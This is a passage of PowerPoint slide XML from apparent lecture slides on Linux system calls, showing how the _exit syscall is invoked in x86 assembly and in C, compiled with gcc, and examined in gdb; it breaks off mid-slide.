            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>#include &lt;unistd.h&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>void _exit(int status)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn dur="indefinite" id="3" nodeType="tmRoot" restart="never">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="4" nodeType="mainSeq">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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132"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33" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{1161B131-7111-4141-B151-31B1315111A1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003680" y="2743200"/>
            <a:ext cx="1358280" cy="533160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>exit.asm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696240" y="3423960"/>
            <a:ext cx="4256280" cy="2671560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>mov eax, 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>mov ebx, 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>int 0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>; Number of the _exit(2) syscall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>; status</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>; Interrupt 0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744840" y="675720"/>
            <a:ext cx="8043120" cy="1738080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>which we will store in the EBX register. Therefore, the instructions for </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>executing this syscall are:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="457200"/>
            <a:ext cx="9143640" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139"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40" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{316181A1-8101-4141-9121-B181E1A18131}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="2006640"/>
            <a:ext cx="5807520" cy="2469600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>As we've stated before, a system call can also be executed by the means </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>of a C function. So let's take a look at how to achieve the same results as </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>above using a simple C program:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670320" y="4272120"/>
            <a:ext cx="2998800" cy="1158840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" wrap="none"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>We only have to compile it:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="" id="144" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670000" y="3248640"/>
            <a:ext cx="1495080" cy="2104560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974880" y="5353560"/>
            <a:ext cx="2148840" cy="542520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ gcc -o exit exit.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn dur="indefinite" id="5" nodeType="tmRoot" restart="never">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="6" nodeType="mainSeq">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699120" y="685800"/>
            <a:ext cx="7745040" cy="5439960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>and disassemble it with gdb to make sure it executes the system call and see how it works under the hood:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147"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48" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{51E1D141-5131-4101-8181-E12181814111}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="1752480"/>
            <a:ext cx="8152920" cy="4478760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$ gdb ./exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>GNU gdb 6.1-debian</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Copyright 2004 Free Software Foundation, Inc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Type "show copying" to see the conditions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>There is absolutely no warranty for GDB. Type "show warranty" for details.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>This GDB was configured as "i386-linux"...Using host libthread_db library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>"/lib/libthread_db.so.1".</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) break main</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Breakpoint 1 at 0x804836a</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) run</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bg>
      <p:bgPr>
        <a:blipFill>
          <a:blip r:embed="rId1"/>
          <a:tile/>
        </a:blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151"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52" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{F15181F1-E191-4151-91F1-217111215191}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="751320"/>
            <a:ext cx="8381520" cy="5576760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
